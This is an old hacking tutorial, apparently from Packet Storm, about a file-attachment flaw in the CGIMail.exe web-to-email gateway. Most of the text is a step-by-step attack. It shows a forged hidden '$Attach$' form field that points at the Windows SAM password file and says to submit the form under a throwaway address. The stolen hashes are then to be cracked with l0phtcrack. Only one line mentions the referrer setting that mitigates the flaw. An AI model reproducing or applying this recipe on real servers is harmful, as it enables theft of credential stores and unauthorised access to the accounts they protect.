Hacking CGIMail.exe.
d1806126f4946a149aa7826536fcd0be<HTML>
<HEAD>
<TITLE>CGIMail</TITLE>
</HEAD>
<BODY BGCOLOR="#ffffff">
<B><P ALIGN="CENTER">CGIMail.exe</P>
<P ALIGN="CENTER"> </P>
</B><P>CGIMail.exe is a Web to e-mail gateway program written by Stalkerlabs for a Win32 platform, that is Windows NT or Windows 95. Basically, you fill in an on-line form and it is e-mailed off. The contents of the form contains the following :</P>
<P> </P>
<P><form action="/scripts/CGImail.exe" method="POST" NAME="TestForm"></P>
<P><input type=hidden name="$File$" value="/scripts/template.txt"></P>
<P><input type=hidden name="$Subject$" value="CGImail Example"></P>
<P><input type=hidden name="$LocationOK$" value="/ok.html"></P>
<P><input type=hidden name="$LocationKO$" value="/ko.html"></P>
<P><input type=hidden name="$To$" value="mnemonix@globalnet.co.uk"></P>
<P><input type=hidden name="$Optional$" value="mmmh, no!"></P>
<P> </P>
<P>There is also another "hidden" input type and this takes the following shape:</P>
<P> </P>
<P><input type=hidden name="$Attach$" value=""></P>
<P> </P>
<P>This allows you to attach a file to the e-mail….any file the IUSR_COMPUTERNAME account has access to. So if the NT server is poorly configured as far as security is concerned you could put in "c:\winnt\repair\sam._" as the input’s value:</P>
<P> </P>
<P><input type=hidden name="$Attach$" value="c:\winnt\repair\sam._"></P>
<P> </P>
<P>Note – Using %windir% won’t work – you need the full path. </P>
<P> </P>
<P>So here’s how the hack would go :</P>
<P>You go to their form page and view the source. Save this source to the desktop and make some editions to it, like put your e-mail address in (use a temporary one!) and put the $Attach$ entry in. Save these changes and then load the new page and click o
n send.</P>
<P>All things going well you should receive a compressed copy of their SAM which you can then get to work on, using l0phtcrack to glean the passwords. </P>
<P> </P>
<P>CGIMail <B><I>can</B></I> be made more secure: the cgimail.ini can be edited so that only certain referrers are accepted but only around 50% of the machines I’ve seen with this on have configured it so.</P>
<P> </P>
<P>You can find out more (no-hacking) info about this program from the vendor’s site:</P>
<P> </P>
<P><A HREF="http://www.stalkerlab.ch/SMailers/index.html">http://www.stalkerlab.ch/SMailers/index.html</A></P>
<P> </P>
</body>
</HTML>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!